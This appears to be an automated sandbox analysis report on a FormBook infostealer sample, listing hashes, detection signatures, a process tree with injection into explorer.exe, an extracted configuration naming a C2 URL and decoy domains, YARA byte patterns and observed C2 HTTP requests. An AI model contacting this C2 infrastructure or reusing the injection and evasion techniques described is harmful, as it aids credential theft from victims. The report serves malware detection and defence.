Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report New_1007572_021.exe

Overview

General Information

Sample Name:New_1007572_021.exe
Analysis ID:458848
MD5:41137fd61b9cc0d92225c91660a5902c
SHA1:15d023fd6d344cb18243469a3ee01fea6bb189af
SHA256:b04306fa8223c20a1abaaa6aeb5cabb2a83dc04337beb2acfd47784b34b682bc
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New_1007572_021.exe (PID: 6688 cmdline: 'C:\Users\user\Desktop\New_1007572_021.exe' MD5: 41137FD61B9CC0D92225C91660A5902C)
    • New_1007572_021.exe (PID: 6280 cmdline: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
      • FB_5908.tmp.exe (PID: 6340 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe' MD5: 74BAFB3E707C7B0C63938AC200F99C7F)
      • FB_5E87.tmp.exe (PID: 6344 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe' MD5: 48ECE2CA39A9EAE7FCED7418CF071D46)
        • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cscript.exe (PID: 6000 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
            • cmd.exe (PID: 6872 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0xa11c:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa386:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15ea9:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15995:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15fab:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x16123:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xad9e:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x14c10:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xba97:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1bd1b:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1cd1e:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18c3d:$sqlite3step: 68 34 1C 7B E1
      • 0x18d50:$sqlite3step: 68 34 1C 7B E1
      • 0x18c6c:$sqlite3text: 68 38 2A 90 C5
      • 0x18d91:$sqlite3text: 68 38 2A 90 C5
      • 0x18c7f:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18da7:$sqlite3blob: 68 53 D8 7F 8C
      00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0xa040:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xa2aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15dcd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x158b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15ecf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x16047:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xacc2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x14b34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb9bb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1bc3f:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1cc42:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 34 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.New_1007572_021.exe.3eb8b30.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.New_1007572_021.exe.3eb8b30.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xe5c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xe82a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x1a34d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x19e39:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x1a44f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1a5c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xf242:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x190b4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xff3b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x201bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x211c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.New_1007572_021.exe.3eb8b30.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x1d0e1:$sqlite3step: 68 34 1C 7B E1
          • 0x1d1f4:$sqlite3step: 68 34 1C 7B E1
          • 0x1d110:$sqlite3text: 68 38 2A 90 C5
          • 0x1d235:$sqlite3text: 68 38 2A 90 C5
          • 0x1d123:$sqlite3blob: 68 53 D8 7F 8C
          • 0x1d24b:$sqlite3blob: 68 53 D8 7F 8C
          10.2.FB_5E87.tmp.exe.1080000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            10.2.FB_5E87.tmp.exe.1080000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 16 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
            Found malware configurationShow sources
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeMetadefender: Detection: 45%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeReversingLabs: Detection: 85%
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeReversingLabs: Detection: 28%
            Multi AV Scanner detection for submitted fileShow sources
            Source: New_1007572_021.exeReversingLabs: Detection: 28%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: New_1007572_021.exeJoe Sandbox ML: detected
            Source: 0.2.New_1007572_021.exe.2d49d5c.1.unpackAvira: Label: TR/Dropper.Gen
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpackAvira: Label: TR/Crypt.XPACK.Gen2
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 8.2.New_1007572_021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: New_1007572_021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: New_1007572_021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe, 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 4x nop then pop esi
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.domoexpra.club/cg53/
            Source: global trafficHTTP traffic detected: GET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1Host: www.comfsresidential.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
            Source: global trafficHTTP traffic detected: GET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1Host: www.comfsresidential.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.comfsresidential.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000000B.00000000.785548112.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.come.comE
            Source: New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comiona
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: New_1007572_021.exe, 00000000.00000002.737740321.00000000010B0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
